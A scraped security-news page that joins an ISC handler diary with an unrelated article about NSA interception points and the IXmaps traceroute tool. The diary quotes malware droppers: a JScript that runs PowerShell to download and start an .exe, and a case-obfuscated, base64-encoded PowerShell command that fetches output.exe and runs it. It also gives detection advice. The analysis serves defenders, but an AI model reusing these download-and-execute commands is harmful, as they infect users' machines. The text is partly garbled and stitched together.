Information Security News
var d=new ActiveXObject(Shell.NormandApplication.replace(Normand, d.ShellExecute(PowerShell,((New-Object System.Net.WebClient).DownloadFile(http://[redacted].exe, xwing.pifStart-Process xwing.pif,,
There is no real obfuscation here, just atrick to avoid the detection of the string Shell.Application which often searched by automated tools
Sometimes, there is no need to implement complex code to bypass detection. A good example comes withPowerShell which has the following cool padding:5px 10px"> poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \ IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\ kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\ AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\ BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\ dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\ 0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g
The decoded inVokE-ExPResSIoN $ENv:tEMP\output.exe
Nothing fancy, easy to decode but this trick will bypass most of the default security controls. A good idea is to fine tune your regular expressions and filters to catch the -encodedcommand string (and ignore the case).
Note that the PE file is downloaded via HTTPS!
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
by Sebastian Anthony
A couple of years ago, when I was investigating the UK's safest ISP, a high-ranking employee at Virgin Media told me there was no NSA or GCHQ Internet traffic interception equipment hiding within Virgin's network. He also said that, in his opinion, not much traffic interception actually occurs in the UK. I asked him why. "Because they don't need to. They'll get your data when lands in the US."
While it's not true that all Internet traffic flows through the US, the addition of a few listening posts at key Internet exchanges in Europe (London, Paris) and some in Asia (Hong Kong, Tokyo) ensure that the NSA and its Five Eyes partners can analyse and ingest the majority of international Internet traffic.
To visualise the extent of the NSA's surveillance network, IXmaps has created a tool that shows you the location of suspected Internet traffic interception points. You can input your own traceroute data, or if you're in a rush you can just bring up traceroute data from people living in the same city or using the same ISP. Then click the "layers" button and turn on NSA, AT&T/Fairview, and Verizon/Stormbrew.